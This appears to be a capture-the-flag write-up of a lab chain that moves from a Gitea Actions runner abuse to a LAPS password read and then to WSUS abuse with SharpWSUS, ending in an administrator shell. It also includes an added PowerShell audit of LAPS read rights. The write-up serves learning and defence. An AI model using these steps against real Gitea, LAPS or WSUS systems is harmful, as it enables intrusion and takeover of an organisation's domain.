Tea (chain) (medium)

port scan

10.10.178.198 srv.tea.vl

10.10.178.197 dc.tea.vl

service enumeration

Register an account; we can then find a runner, SRV.

gitea runner abuse

Since there is a runner, we will create an action so that the runner executes our evil code.

I will create a new repo with .gitea/workflows/demo.yaml

Add our evil job.

push!

After pushing, we must enable Actions on our repo.

Then just commit again with any change.

it works now

we have a beacon!

some enumeration

read LAPS

In the _instal folder, there is a LAPS installer.

We can use Get-LapsADPassword -Identity SRV -AsPlainText to read the administrator password.

It works.
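
From the defender's side, the read above succeeds only because the account running it holds read rights on SRV's LAPS password. The following added example (not part of the original write-up) lists which principals hold those rights under an OU and flags any that are not on an allow-list. It assumes the Windows LAPS PowerShell module that provides Get-LapsADPassword; the OU path and allow-list entries are placeholders.

```powershell
# Added example: audit who can read LAPS passwords under an OU.
# Assumptions: run from a host with the Windows LAPS module and AD access;
# $SearchBase and $Expected are placeholders to replace with real values.
Import-Module LAPS

$SearchBase = 'OU=Servers,DC=example,DC=test'   # placeholder OU
$Expected   = @(                                # placeholder allow-list
    'NT AUTHORITY\SYSTEM',
    'EXAMPLE\Domain Admins'
)

function Get-UnexpectedLapsReader {
    param(
        [Parameter(Mandatory)] [object[]] $Rights,
        [Parameter(Mandatory)] [string[]] $AllowList
    )
    foreach ($entry in $Rights) {
        foreach ($holder in $entry.ExtendedRightHolders) {
            # -notcontains compares strings case-insensitively
            if ($AllowList -notcontains $holder) {
                [pscustomobject]@{
                    ObjectDN  = $entry.ObjectDN
                    Principal = $holder
                }
            }
        }
    }
}

# -IncludeComputers also reports rights set directly on computer objects,
# not only those inherited from the OU.
$rights = Find-LapsADExtendedRights -Identity $SearchBase -IncludeComputers
Get-UnexpectedLapsReader -Rights $rights -AllowList $Expected |
    Format-Table -AutoSize
```

Any service or CI runner account that shows up in the output can recover the local administrator password of the listed computers.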

WSUS abuse

There is a folder called WSUS-Updates.

Get an administrator beacon and run sharpwsus inspect.

It shows that SRV is the WSUS server, so we can use https://github.com/techspence/SharpWSUS to abuse WSUS.

We will push PsExec (only Microsoft-signed binaries are allowed) and add a user.

then approve the request

it works

And the user is there.

Now try again, this time adding our evil user to the Administrators group.

administrator shell!
